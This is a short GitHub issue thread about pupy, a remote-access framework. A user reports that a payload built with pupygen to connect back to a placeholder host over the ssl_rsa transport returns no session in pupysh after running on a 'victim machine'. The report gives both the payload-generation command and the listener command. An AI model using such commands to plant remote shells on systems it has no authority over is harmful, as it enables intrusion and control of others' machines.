### ISSUE TITLE
Failed to communicate with the transport ssl_rsa 

### ISSUE THREAD

**Issue by chaouch** [n1nj4sec/pupy#760]
#./pupygen.py -O linux -A x64 -o /root/Desktop/shell.sh connect --host ip@:port -t ssl_rsa
It works fine and then I execute on the victim machine, but after opening the pupysh I didn't receive any session :
#./pupysh.py -l ssl_rsa ip@:port
note : it works good with the default transport (ssl)

**Comment by alxchk** [comment]
Yep

**Comment by chaouch** [comment]
Still not working

**Comment by alxchk** [comment]
From alxchk/pupy or from this repo?

**Comment by chaouch** [comment]
from alxchk/pupy
